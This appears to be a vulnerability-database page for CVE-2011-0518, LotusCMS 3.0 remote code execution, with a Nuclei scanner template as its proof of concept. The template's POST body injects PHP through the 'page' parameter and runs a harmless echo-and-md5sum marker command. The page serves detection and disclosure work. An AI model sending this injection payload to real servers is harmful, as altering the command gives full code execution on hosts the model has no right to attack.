CVE-2011-0518: LotusCMS 3.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: LotusCMS 3.0 | POC: 已公开

漏洞描述

LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.

PoC代码[已公开]

id: CVE-2011-0518

info:
  name: LotusCMS 3.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
  reference:
    - https://github.com/Hood3dRob1n/LotusCMS-Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2011-0518
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2011-0518
    epss-score: 0.61971
    epss-percentile: 0.9825
    cwe-id: CWE-77
  metadata:
    max-request: 2
    verified: true
  tags: cve,cve2011,lotuscms,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php"
      - "{{BaseURL}}/lcms/index.php"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      page=index');${system('echo lotuscms_rce | md5sum')};#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "38ee63071a04dc5e04ed22624c38e648"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f71ab06bf14be496cfb23f8fca5354eed744c97f9417a037c5c9432edaa294bd022100ee33916bfdf8f3aa4b643f14f7fae97f73431739685723d92ffb08da454fb38c:922c64590222798bb761d5b6d8e72950